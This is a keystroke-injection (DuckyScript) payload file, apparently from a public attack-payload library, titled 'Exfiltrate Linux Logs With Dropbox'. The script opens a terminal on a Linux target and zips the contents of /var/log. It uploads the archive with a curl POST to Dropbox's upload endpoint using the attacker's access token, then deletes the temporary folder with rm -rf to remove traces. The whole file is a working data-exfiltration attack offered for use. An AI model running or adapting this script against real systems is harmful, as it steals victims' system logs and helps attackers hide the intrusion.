Path: blob/master/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
2971 views
REM ######################################################1REM # |2REM # Title : Exfiltrate Linux Logs With Dropbox |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Exfiltration, Execution |6REM # Target : Linux |7REM # |8REM ######################################################910REM Requirements:11REM - Internet Connection12REM - Dropbox Account13REM - - DROPBOX_ACCESS_TOKEN141516DELAY 100017CTRL-ALT t1819REM Required: Set here your Dropbox access TOKEN20DELAY 200021DEFINE TOKEN example22STRING ACCESS_TOKEN="23STRING TOKEN24STRING "25ENTER262728DELAY 50029STRING USER_NAME=$(whoami)30ENTER3132REM Create random num33DELAY 50034STRING RANDOM=$(shuf -i 1-999999999999 -n 1)35ENTER3637REM Folder path38DELAY 50039STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)40ENTER4142REM Zip path43DELAY 50044STRING ZIP_NAME="$RANDOM.zip"45ENTER46DELAY 50047STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"48ENTER4950REM Default log path51DELAY 50052STRING LOG_PATH="/var/log/"53ENTER5455DELAY 50056STRING zip -r "$ZIP_PATH" "$LOG_PATH"57ENTER5859REM Delay of zipping operation - it depends60DELAY 100006162DELAY 50063STRING DROPBOX_FOLDER="/$ZIP_NAME"64ENTER6566REM Send to Dropbox function67DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload68DELAY 50069STRING curl -X POST70STRING DROPBOX_API_LINK71STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"72ENTER7374REM Send timing - it depends75DELAY 50007677DELAY 50078STRING rm -rf "$TMP_FOLDER_PATH"79ENTER808182